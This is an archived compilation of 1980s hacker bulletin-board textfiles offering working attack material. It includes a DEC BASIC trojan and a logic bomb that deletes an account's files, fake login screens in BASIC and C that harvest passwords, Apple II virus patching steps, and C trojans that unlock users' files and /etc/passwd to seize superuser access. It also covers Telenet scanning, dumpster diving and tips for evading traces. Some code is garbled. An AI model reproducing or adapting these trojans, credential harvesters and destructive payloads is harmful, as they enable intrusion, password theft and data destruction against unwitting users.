💾 Archived View for spam.works › mirrors › textfiles › hacking › hacking.dox captured on 2023-11-04 at 13:21:12.

View Raw

More Information

⬅️ Previous capture (2023-06-14)

-=-=-=-=-=-=-

Filename = BBSFILES.DOC

THE FOLLOWING FILES WERE DOWNLOADED BY ME IN ONE EVENING, USING AN IBM-PC AND
MODEM.  THEY WERE DOWNLOADED TO SHOW THE NATURE OF THE INFORMATION READILY
AVAILABLE TO THE THOUSANDS WHO ACCESS HACKER BOARDS - PROVIDED FOR
EDUCATIONAL PURPOSES ONLY, AND NOT TO RECOMMEND OR IMPLY ANY ILLEGAL USE
WHATSOEVER.  THESE FILES JUST RELATE TO COMPUTER PHREAKING.  THERE ARE MANY
MORE ON PHONE BOXING, WEAPONRY AND EXPLOSIVES, LOCKPICKING - YOU NAME IT!
(we are very interested in increasing this file for future updates of
COMPUTER PHREAKING and, separately, adding similar files for our PHONE COLOR
BOXES, and other technical and survival topics we have interest in (see our
catalog).  If you have some good public domain info. for us, please send it
to us in an ASCII file(s), on 5.25" or 3.5" disk (use First Class Mail only),
to:  CONSUMERTRONICS, 2011 Crescent Dr., P.O.  Drawer 537, Alamogordo, NM
88310.  If you require compensation for your help, let us know in advance
what you have and w?a| yot w/u?d lik? for i?)>


D/L1------------------------------

Virus, Trojan Horse, and Decoy Programs:

DEC MAINFRAMES:
===============
    The following were devolped and tested on DEC Basic Plus, running under
the RSTS/E Operating system. All have been tested, and were sucessfully used
in the field.  However, sucessful use depends on the savvy of the sysop,
legitimate users, and illegitimate ones.  They work best on uninformed
(stupid) users and sysops, and when the hacker using them makes them
attractive, as when using trojan horses, or realistic, when using decoys.

TROJAN HORSE:
=============
     What follows is a rough listing of the business end of a typical trojan
horse program.  While this one just lowers the security of the programs on
the affected account, it could be easily modified to create another account,
or execute any other command. The key is the 'sy$=sys(chr$(14)+"....")'
statement.  In BASIC PLUS Programming language, this command lets you execute
a DCL command from within a BASIC Program.  Therefore, any DCL command, COPY,
DELETE, PIP, or even BYE could be inserted in the "...." space. I prefer
using PIP *.* <40> /RE, as what that will do is lower the protection codes
low enough for me to see the files on the account.  This works with both
sysops and non-privlidged users, so I can benefit whenever someone runs it,
as opposed to something the sysop has to run in order for it to do whatever.
As a plus, if a sysop runs it, certain hidden files on the [1,*] account he/
she's using will become visible, which will, provided you know what you're
doing, enable you to get sysop status. Of course, you could also use PIP
[*,*] *.* <40> /RE, which, if a sysop runs it, will lower the protection of
every file on the system, one would have to add an error checking routine in
case a non-sysop ran it.

10 extend
20 sy$=sys(chr$(14)+"PIP *.* <40> /RE") 30 rem the following would be the
interesting little game you've wrote which 40 rem makes the program look
atractive, and compels the hapless user to 50 rem run it.  60 end

LOGIC BOMB:
===========
     The following is an example of a simple logic bomb, which has proven to
Work very well. What it does is create a file on the effected account which
will delete all files on the account upon the next login, it also dumps the
user off the system for good measure, you could remove the logoff procedure,
and not affect program operating, but they then stand a chance of noticing
the little file you've added.

    10 extend
    20 open "login.com" as file #1
    30 print #1,"pip *.* <60> /re"
    40 print #1,"delete *.*"
    50 close #1
    60 sy$=sys(chr$(14)+"bye/f")
    70 end

     Now, line 30 is optional in this program. I have included it in case the
user has protected his files from accidental deletion.  There is one instance
in which this program won't work properly. This is when the defualt language
upon logon isn't DCL, on occasion, some systems have BASIC as the default. In
this case, just add the following line.

    25 print #1,"sw dcl"

And you'll switch to DCL before continuing to the rest of the program.

THE DECOY:
==========
     This decoy is to be used on local terminals, ones that are connected to
the system via RS-232, such as in schools. It is also the riskiest of these
programs to use. What it basicly does is wait until input, and then act as a
login program, saving the users id# and password. Upon getting it, it informs
the user of an "invalid entry" and then returns control to the system.  There
are a number of things to keep in mind when using this program. The first is
to change the program so it looks like your system.   The second is to
remember that it runs under the account it's on, therefore you take a risk of
someone hitting [Break] while it's running, and getting into your account.
Finally, due to the BASIC language, you'll only get the project number of the
account (what's before the comma). However, since you'll have the password,
you'll get it in less than 255 tries.

    10 extend
    20 open "kb:" as file #1%
    30 input #1%, z$
    40 print "RSTS v8.0-06 MICOM I Job <10> KB31:  ";date$(0);" ";time$(0)
    50 print
    60 print "Username:  ";
    70 input #1%, u$
    80 print "Password: ";
    90 sy$=sys(chr$(3))
    100 input #1%, p$
    110 sy$=sys(chr$(2))
    120 print:  print "Invalid Entry - Try Again"
    130 print:  print
    140 print "Username: ";
    150 input #1%, r$
    160 sy$=sys(chr$(3))
    170 print "Password: ";
    180 input #1%, s$
    190 sy$=sys(chr$(2))
    200 open "acct.txt" as file #2
    210 print #2,u$
    220 print #2,p$
    230 print #2,r$
    240 print #2,s$
    250 close #2
    260 print:  print "Access Denied"
    270 sy$=sys(chr$(14)+"bye/f")
    280 end

     The parts which have to be changed are line 40, and the number of tries
it allows before logging you off. The system I used for devolpment allowed
only two tries, and most I've seen only allow two, but, it isn't always that
way.  Finally, remember to save ALL input, for reasons which should be
obvious.

FREE MEMORY:
============
     While this program isn't classified as a trojan horse, decoy, logic
bomb, or virus. It's quite interesting, and I've decided to include it.  This
program enables you to look at unallocated space on the system's disk.  It's
very useful when the sysop is creating and deleting accounts, and in schools
in order to yank deleted files, which happens when students are modifying
programs.

    10 open "free.mem" as file #1%
    20 put #1%, record nnnnn%
    30 close #1%

GENERAL NOTES ON PC VIRUSES
===========================
     Writing "funny programs" on PCs is a big pain-in-the-a__.  There are two
major reasons why.  The first is that most users know their PCs(Personal
Computers in general, not just IBM) like the back of their hand, and that any
wierdness would be immediately noticed, unlike a big multiuser system, where
there are amoungst other users, and basicly isolated in their own little
section of RAM.  Secondly,  they have to be extremly small, as to be hidden
effectively.  While one can write the perfict virus with 64k, try writting
one in a few bytes of space.  Personally, I feel the best way to screw over a
computer user is to put a magnet to his disks, but if you want to do it the
hard way, it is possible.

APPLE II+, //e. //c:
====================
     The Apple series of computers is one of the simplest machines to
"infect", so to speak. Perhaps this is because it creator was a prima donna
hacker, but who knows. DOS 3.3 has several unsed spots in it, which are
adequete to hide a virus in. They are (in hex) $B78D-$B792 and $BCDF-$BCFF.
You can also, on pre-1983 versions of DOS 3.3, use BA69-BA93. There are also
some spots which aren't unused, but are used for such DOS commands such as
VERIFY, LOCK, UNLOCK, CHAIN, and MAXFILES.  The classic virus program on the
Apple a machine language program which counts how many times someone does a
certain function, such as CATALOG, LOAD, or SAVE, and upon reaching a certain
number, initializes the disk. It is based in DOS memory, which means that
once the affected disk is booted, it stays in the machine until power down,
and can affect any disk which is used with said machine. It will also be
transfered to any disk which is initalized by the machine. The actual program
is very simple, provided you know 6502 machine language. What you do is make
a patch to the Command handler entry point for the Catalog command. The
location for the command handler is from $9D1E to $9D55.  Look around in
there until you find a string which says "6EA5" this is the entry point for
the Catalog Handler, which is $A56E. Remember that.  Change it to the
beginning of your "modification". I recommend $BCDF, since it is the bigest
stretch of memory which is truly safe.  You then write a program which will
do an LDX (Load X Register) from a memory location where you're counter is,
say $B78D. You compare that memory to the number of times you want the
command to go through before deletion, say 20 hex. (CPA $20) if the number of
times is greater than the the number in the Compare statement ($20) then jump
to the init subroutine (BPL $4F5A)(The INIT start location is $5A4F), if not,
then Increment the X Register by 1 (INX $01), store it (STX $8DB7), you then
continue with your program by Cataloging the disk (JMP $6EA5).  End of
program.  I have found this to be one of the best virus programs, as these
things go.


D/L2---------------------------------------

COMMENTS ON "SMART" HACKING:
---------------------------
    Never trust a change in a system.  The 414s, the (expletive deleted),
were caught for this reason:  When one of them connected to the system, there
was nothing good there.  The next time, there was a Trek game stuck right in
their way!  They proceeded to play said game for two, say two and half hours,
while TELENET was tracing them!  Nice job, don't you think?  If anything
looks suspicious, drop the line immediately!!  As in Yesterday!!  The point
we're trying to get across is:  If you use a little common sense, you won't
get busted.  Let the little kids who aren't smart enough to recognize a trap
get busted, it will take the heat off the real hackers.  Now, let's say you
get on a computer system... it looks great, checks out, everything seems
fine.  Ok, now is when it gets more dangerous.  You have to know the computer
system (see future issues of this article for info on specific systems) to
know what not to do.  Basically, keep away from any command which looks like
it might delete something, copy a new file into the acoount, or whatever!
Always leave the account in the same status you logged in with.  Change

don't try any commands that require them!  All, yes, all systems are going to
be keeping log files of what users are doing, and that will show up.  It is
just like dropping a trouble-card in an ESS system, after sending that nice
operator a pretty tone.  Spend no excessive amounts of time on the account in
one stretch.  Keep your calling to the very late night if possible, or during
business hours (believe it or not!).  It so happens that more users are on
during business hours, and it is very difficult to read a log file with 60
users doing many commands every minute.  Try to avoid systems where everyone
knows each other.  Don't try to bluff.  And above all:  Never act like you
own the system, or are the best there is.  They always grab the people who's
heads swell...

There is some very interesting front end equipment arownd nowadays.   But
first let's define terms...  By front end, we mean any device that you must
pass thru to gat at the real computer.  There are devices that are made to
defeat hacker programs and just plain old multiplexers.  To defeat hacker
programs, there are now devices that pick up the phone and just sit there...
This means that your device gets no carrier, thus you think there isn't a
computer on the other end.  The only way around it is to detect when it was
picked up.  If it picks up after the same number ring, then you know it is a
hacker-defeater.  These devices take a multi-digit code to let you into the
system.  Some are, in fact, quite sophisticated to the point where it will
also limit the user name's down, so only one name or set of names can be
valid logins after they input the code...  Other devices input a number code,
and then they dial back a pre-programmed number for that code.  These systems
are best to leave alone, because they know someone is playing with their
phone.  You may think "But I'll just reprogram the dial-back."  Think again,
how stupid that is... Then they have your number, or a test loop if you were
just a little smarter.  If it's your number, they have your (expletive
deleted) (if male), if it's a loop, then you are screwed again, since those
loops are "monitored."

As for multiplexers... what a plexer is supposed to do is this:  The system
can accept multiple users.  We have to time share, so we'll let the front-end
processor do it...  Well, this is what a multiplexer does.  Usually they will
ask for something like "enter class" or "line:".  Usually, it is programmed
for a double digit number, or a 4 or 5 letter word.  There are usually a few
sets of numbers it accepts, but those numbers also set your 300/1200 baud
data type.  These multiplexers are inconveneint at best, so not to worry.

A little about the history of hacking:  Hacking, by our definition, means a
great knowledge of some special area.  Doctors and lawyers are hackers of a
sort, by this definition.   But most often, it is being used in the computer
context, and thus we have a dedinition of "anyone who has a great amount of
computer or telecommunications knowledge."  You are not a hacker because you
have a list of codes...  Hacking, by our defintion, has been around only
about 15 years.  It started, where else but, MIT and colleges where they had
Computer Science or Electrical Engineering departments.  Hackers have created
some of the best computer languages, the most awesome operating systems, and
even gone on to make millions.  Hacking used to have a good name, when we
could honestly say "We know what we are doing."  Now it means (in the public
eye):  The 414s, Ron Austin, the NASA hackers, the ARPANET hackers... all the
people who have been caught.  thus we come past the moralistic crap, and to
our purpose:  Educate the hacker community...........


D/L3----------------------------

UNIX TROJAN HORSE - By Shooting Shark
-------------------------------------
    This program simulates the login for a UNIX machine.  However, the login
and password are written to a file in your directory.  The user geat a "login
incorrect" message and thinks they have mis-typed their password.  They are
given a second chance, but the new 'login:' prompt is the real one - they
then get access to their account and are none the wiser.

You must be running a fairly robust version of UNIX.  4.2 or 4.3bsd, or AT&T
System V are fine.  I wrote this one on a Pyramid 90x32 bit system running
the above flavors of UNIX.  It works fine for me and should work on your
system fine with no modification.

To run the program, enter the source given below in a file called 'horse.c'
and configure it as necessary (see below).  Then, from the shell promp, type:

    cc horse.c -lcurses -ltermcap  (to compile the program)

then type:

    mv a.out horse  (to rename the object code.)

Voila, you now have a program which can be tested by typing 'horse'.
However, in order for the program to work properly, it must be called from a
shellscript.  Create a file calle script and enter these two lines:

    horse   (invokes your program)
    login

Now, type:

    source script   (run the shell script)

to execute the above file.  The horse program will be run.  It will simulate
the login process.  After completing its task it will invoke the REAL login
process.

If you wish, you can tack the above two lines to your ".logout" file (the
shellscript which is executed when you log out) so the program will be
automatically executed each time you log out normally.

----Source Begins Here----

    #include <curses.h>
    #include <signal.h>
    int stop();
    main()
    [
    char name[10], password[10];
    int i;
    FILE *fp, *fpopen();
    signal(SIGINT,stop);
          initscr();
          printf("\n\nTiburon Systems
    4.2/Sys V UNIX (tiburon)\n\n\n\nlogin:");

/*The above line is very important - it prints the header that your machine
prints when it greets the world.  Change this line so it says what your
machine would say.  Each \n is a carriage return*/

    scanf("%[^\n]",name)
    getchar();
    noecho();
    printf("Password:");
    scanf("%[^\n]',password),
    printf("\n");
    getchar();
    echo();
    sleep(5);

/*sleep(x) is the delay between prompting for a password and printing "Login
incorrect."  Change it so it looks like your login routine's speed*/

    if ( ( fp = fopen("stuff","a") ) ! = -1 ) [
    fprintf(fp,"login %s has password %s\n",name,password);
    fclose(fp);  ]

    printf("Login incorrect\n");
    endwin();  ]

    stop() [    /*the ^C trap.*/
    exit(0);  ]

----Source Ends Here----

OK.  After you have run the program successfully and people have fallen for
it, a file called "stuff" will have a table of all login name/password
combinations snagged.  (This file can be incriminating so delete it whenever
necessary.)

This program traps ^C's entered by suspicious users.  However, it can't catch
a ^Z (STOP signal) so it is vulnerable to them.  If somebody stops your
program, they will be in your account and your little game will be up.  Also,
take care that you are using a terminal that times out after a few minutes
while waiting for somebody to come up to the terminal you're running it on.


D/L4--------------------------

THIS IS YET ANOTHER SHOOTING SHARK CONTRIBUTION TO UNIX INSECURITY

Introduction
------------
    "UNIX Security" is an oxymoron.  It's an easy system to brute-force hack
(most UNIX systems don't hang up after x number of login tries, and there are
a number of default logins, such as root, bin, sys and uucp).  Once you're in
the system, you can easily bring it to its knees (see my previous Phrack
article, "UNIX Nasty Tricks") or, if you know a little C, you can make the
system work for you and totally eliminate the security barrier to creating
your own logins, reading anybody's files, etc.  This file will outline such
ways by present C code that you can implement yourself.

Requirements
------------
    You'll need a working account on a UNIX system.  It should be a farily
robust version of UNIX (such as 4.2bsd or AT&T System V) running on a real
machine (a PDP/11, VAX, Pyramid, etc) for the best results.  If you go to
school and have an account on the school system, that will do perfectly.

Notes
-----
    This file was inspired by an article in the April, '86 issue of BYTE
entitled, "Making UNIX Secure."  In the article, the authors way "We provide
this information in a way that, we hope, is interesting and useful yet stop
short of being a 'cookbook for crackers.'  We have often intentionally
omitted details."  I am following the general outline of the article, giving
explicit examples of the methods they touched on.

Project One:  Fishing for Passwords
-----------------------------------
    You can implement this with only a minimal knowledge of UNIX and C.
However, you need access to a terminal that many people use - the computer
lab at your school, for example.  When you log onto a typical UNIX system,
you see something like this:

    Tiburon Systems 4.2bsd / System V
    (shark)

    login: shark
    Password (the password is not printed)

The program I'm giving you here simulates a logon sequence.  You run the
program from a terminal and then leave.  Some unknowing fool will walk up and
enter their login and password.  It is written to a file of yours, then
"login incorrect" is printed, then the fool is asked to log in again.  The
second time it's the real login program.  This time the person succeeds and
they are none the wiser.

On the system, put the following code into a file called 'horse.c'.  You will
need to modify the first 8 lines to fit your system's appearance.

----Code Begins Here----

    #define SYSTEM "\n\nTiburon Systems 4.2bsd UNIX (shark)\n\n"
    #define LOGIN "login: "

/*The above is the login prompt.  You shouldn't have to change it unless
you're running some strange version of UNIX*/

    #define PASSWORD "password:"

/*The above is the password prompt.  You shouldn't have to change it,
either*/

    #define  WAIT 2

/*The numerical value assigned to WAIT is the delay you get after "password:"
Change it (0 = almost no delay. 5 = long delay) so it looks like your
system's delay.  Realism is the key here - we don't want our target to become
suspicious.*/

    #define INCORRECT "Login incorrect.\n"

/*Change the above so it is what your system says when an incorrect login is
given.  You shouldn't have to change it.*/

    #define FILENAME "stuff"

/*FILENAME is the name of the file that the hacked passwords will be put into
automatically.  'stuff' is a perfectly good name.  Don't change the rest of
the program unless there is a need to and you know C*/

    #include <curses.h>
    #include <signal.h>
    int stop();
    main() [
    char name[10], password[10];
    int i;
    FILE *fp, *fpopen();
    signal(SIGINT,stop);
    initscr();
    printf(SYSTEM);
    printf(LOGIN);
    scanf("%[^\n]",name)
    getchar();
    echo();
    sleep(WAIT);
    printf("\n");
    getchar();
    echo();
    if ( ( fp = fopen(FILENAME,"a") ) ! = NULL) [
    #fprintf(fp,"login %s has password %s\n",name,password);
    #fclose(fp);
    #] 

    printf(INCORRECT);
    endwin(); ]

    stop() [
    endwin();
    exit(0);  ]

----Source Ends Here---- 

OK, as I said, enter the above and configure it so it looks exactly like your
system's login sequence.  To compile this program called 'horse.c' type the
following two lines: (don't type the %s, they are just a sample prompt)

    % cc horse.c -lcurses -ltermcap
    % mv a.out horse

You now have the working object code in a file called 'horse'.  Run it, and
if it doesn't look like your systems logon sequence, re-edit horse.c and re-
compile it.  When you're ready to put the program into use, create a new file
and call it 'trap' or something.  'trap' should have these two commands:

    horse   (runs your program)
    login   (runs the real login program)

to execute 'trap' type:

    % source trap   (again, % is just the prompt)

and walk away from your terminal.

After you've run it successfully a few times, check your file called 'stuff'
(or whatever you called it).  It will look like this:

    user john has password secret
    user mary has password smegma
                 .
                 .
                 .
Copy down these passwords, then delete this file (it can be VERY
incriminating if the superuser sees it).

Note - for best results your terminal should be set to time-out after a few
minutes of non-use - that way, your horse program doesn't run idle for 14
hours if nobody uses the terminal you ran it on.

The next projects can be run on a remote system, such as the VAX in Michigan
you've hacked into, or Dartmouth's UNIX system, or whatever.  However, they
require a little knowledge of C language.  They're not something for UNIX
novices.

Project Two: Reading Anybocy's Files
------------------------------------
    When somebody runs a program, they're the owner of the process created
and that program can do anything they would do, such as delete a file in the
directory or making a file of theirs available for reading by anybody.

When people save old mail they get on a UNIX system, it's put into a file
called "mbox" in their home directory.  This file can be fun to read but is
usually impossible for anybody but the file's owner to read.  Here is a short
program that will unlock (ie: chmod 777, or let anybody on the system read,
write or execute) the mbox file of the person who runs the program:

----Code Begins Here----

    #include <pwd.h>

    struct passwd *getpwnam(name);
    struct passwd *p;
    char buf [255];

    main()  [
    p = getpwnam(getlogin());
    sprintf(buf,"%s/%s",p->pw_dir,"mbox");
    if ( access(buf,0) >-1 ) [
        sprintf(buf,"chmod 777%s/%s",p->pw_dir,"mbox");
        system(buf); ]
    ]

So the question is:  How do I get my target to run this program that's in my
directory?

If the system you're on has a public-messages type of thing (on 4.xbsd, type
'msgs') you can advertise your program there.  Put the above code in another
program (ie: IMPLANT A TROJAN HORSE) - find a utility or game program in some
magazine like UNIX WORLD and modify it and do the above before it does it's
real thing.  so, if you have a program called tic-tac-toe and you've modified
it to unlock the mbox file of the user before it plays tic-tac-toe with him,
advertise "I have a new tic-tac-toe program running that you should all try.
It's in my directory." or whatever.  If you don't have means of telling
everybody on the system via a public message, then just send mail to the
specific people you want to trap.

If you can't find a real program to modify, just take the above program and
add this line between the two ']' at the end of the program:

    printf("Error opening tic-tac-toe data file.")

when the program runs, it will print the above error message.  The user will
think "Heh, that dude doesn't know how to write a simple tic-tac-toe
program!" but the joke's on him - you can now read his mail.

If there's a specific file in a user's directory that you'd like to read (say
it's called "secret") just throw together this general program:

    main()  [
    if ( access("secret",0) > -1 )
    system("chmod 777 secret"); ]

then 'talk' or 'write' to him and act like Joe Loser:  "I wrote this program
called super_star_wars, will you try it out?"

Use your imagination.  Think of a command you'd like somebody to execute.
Then put it inside a system() call in a C program trick them into running
your program!

Here's a very neat way of using the above technique:

Project Three:  Become the Superuser
------------------------------------
    Write a program that you can get people to run.  Put this line in it
somewhere:

    if ( !strcmp(getlogin(),"root") )
    system("whatever you want");

This checks to see if the root login is running your program.  If he is, you
can have him execute any shell command you'd like.  Here are some
suggestions:

    "chmod 777 /etc/passwd"

/etc/passwd is the system's password file.  The root owns this file.
Normally, everyone can read it (the passwords are encrypted) but only the
root can write to it.  Take a look at it and see how it's formatted if you
don't know already.  This command makes it possible for you to write to the
file (ie: create unlimited accounts for yourself and your friends).

    "chmod 666 etc/group"

By adding yourself to some high-access groups, you can open many doors.

    "chmod 666 /usr/lib/uucp/L.sys"

Look for this file on your system if it is on the uucp net.  It contains
dialups and passwords to other systems on the net, and normally only the uucp
administrator can read it.  Find out who owns this file and get him to
unknowingly execute a program to unlock it for you.

If you can get the root to execute this command, the system's passwd file
will be removed and the system will go down and will not come up for some
time to come.  This is very destructive.

If you are going to go about adding a trojan horse program to the system,
there are some rules you should follow.  If the hidden purpose is something
major (such as unlocking the user's mbox or deleting all of his files or
something) this program shouldn't be a program that people will be running a
lot (such as a popular computer game) - once people discover that their files
are public access the source of the problem will be discovered quite easily.
Save this purpose for a 'test' program (such as a game you're in the process
of writing) that you ask individual people to run via mail or 'chatting' with
them.  As I said, this 'test' program can bomb or print a phony error message
after completing its task, and you will just tell the person "well, I guess
it needs more work", wait until they log off, and then read whatever file of
theirs that you've unlocked.  If your trojan horse program's sole purpose is
to catch a specific user running it - such as the root or other high-powered
user - you can put the code to do so in a program that will be run a lot by
various users of the system.  Your modification will remain dormant until he
runs it.  If you can't find the source to 'star trek' or whatever in C, just
learn C and convert something from pascal.  It can't hurt to learn C as it's
a great language.  We've just seen what it can do on a UNIX system.  Once
you've caught the root (ie: you can now modify the /etc/passwd file) remove
the spurious code from your trojan horse program and you'll never be caught.


D/L5----------------------------

    TELENET HACKING

PREFACE:
--------
    TELENET is a huge network which lets you enter another computer via
TELENET's and costs a little extra to those who log-on to their own
connection and account (but of course we shall ignore that).

HACKING:
--------
    First dial your local TELENET dial up - here is just a few
    BUFFALO        (716) 847-0600
    CHICAGO        (312) 938-0500
    DETROIT        (313) 964-5538
                         964-2089
    MANHATTAN      (212) 736-0099
                         947-9600
                         785-2540
    ROCHESTER      (716) 454-3430
                         454-1020
    WASHINGTON DC  (202) 347-1400
                   (703) 435-3333 
    WHITE PLAINS   (914) 328-9199

If your area is not listed contact your local phracker (phreaker/hacker) and
ask him if he has a local dial-up for your area.

Once you log on <RETURN> and it will ask you for a terminal identifier.  You
can type "D1" if you are using a PC or just hit <RETURN>.

There are thousands of computer systems connected to TELENET, all you need to
do is type their connection number.

The format is:  C NPAXX or C NPAXXX  where:
    C is the abbreviation for "Connection"
    NPA is the area code of the computer system you wish to find
    XX or XXX is an 2, and sometimes 3 digits

So, to search for a computer in 202, you would hack from 20201 up to 20299
and 202001 to 202999.

RESPONSE:
---------
    Once you dial the connection number of what you hope is a computer
system, you will most likely get one of the following responses (we will use
21211 as an example):

    "?" - You typed in something wrong (see format)
    "212 11 ILLEGAL ADDRESS" - There is no computer system at 212 11 (try
another)
    "212 11 CONNECTED" - You are now connected to the system at 212 11 and
should proceed)
    "212 11 NOT RESPONDING" - There is a computer system at 212 11 but it is
not working now (try later)
    "212 11 NOT REACHABLE FROM..." - There is a computer system at 212 11 but
it cannot be reached by this TELENET dial-up (try a different dialup)
    "212 11 DOES NOT ACCEPT COLLECT CALLS" and
    "212 11 DOES NOT ACCEPT COLLECT CALLS. PLEASE ESTABLISH A PAID CALLER
ACCOUNT" - In most cases the computer system will aceept collect calls from
whomever calls them, but a few require you to establish a specific log on
with TELENET first to place a paid call to a given connection.

COMMANDS
--------
    Here is a short summary of TELENET commands.

    COMMAND      EFFECT
    -------      ------
    FULL         Sets net to full duplex (no echo)
    HALF         Sets net to half duplex (echo)
    D            Disconnect from node if still attached
    CONTINUE     Continue on system if still attached
    ID           Unknown.  Maybe an ANI for nodes with security checking

Commands may be typed in upper or lower case.

You must first get the TELENET's attention to use the commands if you are
still attached to a node.  The sequence of commands are:

    <RETURN>    (will be followed by a "@")
    <RETURN>    (if correct, the word "TELENET" should appear as well as
                 another "@")

COMMENTS:
---------
    TELENET is a rather safe network to hack off of because the locations
usually cannot trace you and if they do, can probably not trace you thru
TELENET.  Also, if a computer system is far away and you wish to log onto it,
there is no extra cost other than the cost to call TELENET.


D/L6--------------------------

    TRASHING TECHNIQUES VOLUME i

PREFACE:
--------
    This volume will deal with the basics of trashing.

    You might be saying, "What is trashing?  And why should I trash?".
Trashing is, to put it bluntly, the "inspection" of companies, schools,
peoples, etc. trash dumsters for the purpose of finding important material
that a person might find useful.  (SOME MAY REASON THAT IF TRASHING IS GOOD
ENOUGH FOR THE POLICE TO DO, ACCORDING TO THE U.S. SUPREME COURT, THEN IT
MUST BE GOOD ENOUGH FOR THE PEOPLE TO DO)

THE ART OF TRASHING
-------------------
    Before attempting to trash a certain place (for example, I will use a
local AT&T building), you might find it useful to follow the "rules" of the
trasher.

Before you begin to dive into the nearest dumpster, first find out about the
security (if any) by watching the building for a few days and take notes on
what goes on, in, and around the building.  Next, find out the garbage
truck(s) route and schedule so you can trash at the most beneficial times.
To truly trash, you must be willing to climb into the trash dumpster(s) and
be prepared to dig for the "gold."  You must climb all the way in and dig
around because most of the important trash is usually at the bottom (huge
print-outs, heavy memo books, etc).  You cannot just run over and reach for
the nearest bag, you might find something useful but most probably you will
find someones used coffee cup.

After removing the trash you think you might find interesting, do not rummage
thru the selected garbage there, wait till you are in a secluded spot, a
forest or your home (only if you live nearby because the trash can be very
heavy if you don't have a car) for example.

GETTING CAUGHT
--------------
    The probability of getting caught is very slim (except for AT&T offices
and things of that sort).  Here is a true life example:

It was a cold and dark night and a few friends and I were only on our seventh
time of trashing.  All was cool until, from a distant side door a guard came
running out to see what we were doing.  Having been surprised and having no
way of escaping (I was buried deep in the garbage and certainly had no chance
to escape), we waited for the guard to arrive.  the guard rushed over and
said, "What are you doing here?  This is private property!"

After looking at me and doing a double take he then added, "What the hell are
you doing in there???"  We were quite nervous and after about a minute or so
one of my friends said, "Oh,  we were just walking thru the forest and we
took a short cut thru here."  I thought that that was a stupid thing to say
becuase why would we take a short cut thru a trash dumpster?!!  To my
surprise, however, the guard said, "Well, OK, but don't come around here
again or you will be arrested!"  We left and returned the next day for a
successful night.

WHAT THEY CAN DO
----------------
If you ever get caught, they (the company - usually security) will most
probably let you go and not do anything about it because it sounds pretty
funny saying, "I want him (them) prosecuted for taking out the garbage!"  The
only thing they can really do is to get you for trespassing which they don't
usually do to nice kids anyway, although AT&T has been known to prosecute
anyone caught in their garbage.

COMMENTS
--------
    Most of the time, you don't have to worry about food and other
interesting trash (except if you like to recycle used food and in that case
you are probably too fat to fit in a trash dumpster) because big companies
usually have separate dumpsters for cafeteria food.

I recommend that you trash with as many people as you can because it will be
much quicker and safer because some people can be "look outs" (do not trash
with over seven people though, because it begins to get noisy).  Don't feel
threatened by bright security lights or guards, they are usually easy to
avoid and since there are not usually bright lights near or on the trash
dumpsters, you will be home free.

Of course, all of the above does not count for AT&T.  AT&T has since become
aware of the trasher and has one or even all of the following securities:
    (1)  A lock on the trash dumpster.
    (2)  Dumpsters flooded by bright security lights.
    (3)  Guards located near or sometimes at the dumpsters.
    (4)  Fence and barbed wire enclosing dumpsters.
    (5)  Shredded garbage (the trasher's worst nightmare)

There are more, but these are the most popular.

Trashing is an art, so if at first you don't succeed, trash, trash again.

rash again.